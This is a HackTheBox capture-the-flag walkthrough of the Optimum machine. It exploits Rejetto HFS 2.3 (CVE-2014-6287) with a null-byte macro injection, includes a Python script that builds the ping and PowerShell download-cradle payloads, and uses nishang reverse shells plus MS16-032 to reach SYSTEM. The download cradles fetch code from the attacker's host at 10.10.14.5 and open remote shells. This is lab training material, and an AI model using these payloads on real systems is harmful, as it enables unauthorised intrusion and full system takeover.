HackTheBox - Optimum


Last updated 4 years ago


Nmap scan (Basic and all port)

The full port scan (-p-) gave the same result as the default scan, so our attention goes to port 80 (HTTP server).

Website Surface Testing

The website is running Rejetto HTTP File Server (HFS); the page title reports the version as HttpFileServer 2.3. There is a known remote code execution vulnerability for this version.

We can use searchsploit, or simply Google, to look up the vulnerability.

CVE-2014-6287 (Exploit)

From the Rejetto wiki: macros, also known as template macros, are commands with useful effects that users can put into an HFS template to improve it or to create functionality not otherwise available. CVE-2014-6287 abuses that feature. In HFS 2.3x before 2.3c the findMacroMarker function in parserLib.pas mishandles a %00 (null byte) in a search action, so a request like /?search=%00{.exec|cmd.} gets past the macro filtering and the {.exec|...} macro runs the given program with the privileges of the HFS process.

References: 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287
https://www.exploit-db.com/exploits/39161

Manual Exploitation

The search parameter is the injection point: a leading %00 followed by HFS macro script in that parameter gives us Remote Code Execution. A blind test is an exec macro that pings our box, for example /?search=%00{.exec|ping -n 1 <our-ip>.}.

We get a ping request back (watch with tcpdump on the VPN interface), which confirms RCE. To turn that into a shell we host nishang's Invoke-PowerShellTcp.ps1 on a web server on our machine, append a line that calls it in reverse mode (Invoke-PowerShellTcp -Reverse -IPAddress <our-ip> -Port <port>), start a listener on that port, and run a PowerShell download cradle through the same exec macro so the target fetches and executes the script.

Note: make sure to URL encode the payload (braces, the pipe, spaces and quotes). Only the leading %00 goes in as-is, since that is the null byte that triggers the bug.
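The following is an added example (not from the original writeup and not Rejetto's or Exploit-DB's code) that builds the two requests described above, the ping check and the PowerShell download cradle, against the HFS search parameter. The target address 10.10.10.8, the web server port 8000, the listener port 4444 and the file name Invoke-PowerShellTcp.ps1 are assumptions; 10.10.14.5 is the attacker address the writeup uses.

```python
"""CVE-2014-6287 request builder for HFS 2.3 (added example, not from the page).

Assumed values (not from the writeup): target 10.10.10.8:80, payload served on
port 8000, reverse shell listener on 4444, script name Invoke-PowerShellTcp.ps1.
"""
from urllib.parse import quote
import urllib.request

ATTACKER = "10.10.14.5"          # attacker IP used in the writeup
TARGET = "http://10.10.10.8:80"  # assumed target address


def hfs_macro(command: str) -> str:
    """Wrap a command in an HFS exec macro: {.exec|<command>.}

    '|' separates macro parameters in HFS, so a command containing one would be
    split by the macro parser; refuse it instead of sending a broken payload.
    """
    if "|" in command:
        raise ValueError("'|' is an HFS macro parameter separator; not supported here")
    return "{.exec|" + command + ".}"


def search_payload(command: str) -> str:
    """Return path+query for the vulnerable search action.

    The %00 is sent raw: it is the null byte that makes findMacroMarker stop
    filtering the macro markers. Everything after it is percent-encoded with
    safe='' so braces, the pipe, spaces and quotes survive the trip and are
    decoded by HFS on the other side.
    """
    return "/?search=%00" + quote(hfs_macro(command), safe="")


def ping_check(attacker: str = ATTACKER) -> str:
    """Stage 1: blind RCE confirmation; watch for ICMP with tcpdump -i tun0 icmp."""
    return search_payload(f"ping -n 1 {attacker}")


def reverse_shell(attacker: str = ATTACKER, http_port: int = 8000,
                  script: str = "Invoke-PowerShellTcp.ps1") -> str:
    """Stage 2: PowerShell download cradle fetching nishang's reverse shell.

    The served script must end with its own invocation line, e.g.
    Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 4444 (port assumed),
    and a listener (nc -lvnp 4444) must already be waiting.
    """
    cradle = ("powershell -ExecutionPolicy Bypass -NoProfile -Command "
              f"IEX(New-Object Net.WebClient).DownloadString('http://{attacker}:{http_port}/{script}')")
    return search_payload(cradle)


def send(path_query: str, target: str = TARGET, timeout: float = 5) -> int:
    """Fire the request. HFS answers the search page with 200 whether or not the
    macro ran, so success is judged by the ICMP or shell callback, not the status."""
    with urllib.request.urlopen(target + path_query, timeout=timeout) as resp:
        return resp.status


if __name__ == "__main__":
    # Print the encoded requests so they can be checked (or pasted into a browser).
    print(ping_check())
    print(reverse_shell())
    # send(ping_check())  # uncomment on the lab VPN to actually fire stage 1
```

Run it once without send() to inspect the encoded query; the ping payload should read /?search=%00%7B.exec%7Cping%20-n%201%2010.10.14.5.%7D. The null byte stays as the three literal characters %00 in the request line, and the helper refuses commands containing a pipe because HFS would split the macro on it.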

Running Sherlock.ps1 (By Rastamouse)

Sherlock compares the installed hotfixes against a list of known local privilege escalation bugs; here it reports the system as likely vulnerable to MS16-032 (Secondary Logon Handle Privilege Escalation). The original PoC on Exploit-DB spawns an interactive SYSTEM cmd window, which does us no good over a reverse shell, but Empire ships a modified Invoke-MS16032.ps1 that takes a -Command parameter, so we use that.

MS16-032 Exploitation (Secondary Logon Handle Privilege Escalation)

Add the following line of code at the end of the MS16-032 script and edit the IP, port and file name to match your setup. shell2.ps1 should be a second copy of the nishang reverse shell served from the same web server, calling back on a different port from the first one so the SYSTEM shell does not collide with the user shell.

Invoke-MS16032 -Command "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/shell2.ps1')" 

GitHub links:

https://github.com/samratashok/nishang/tree/master/Shells
https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-MS16032.ps1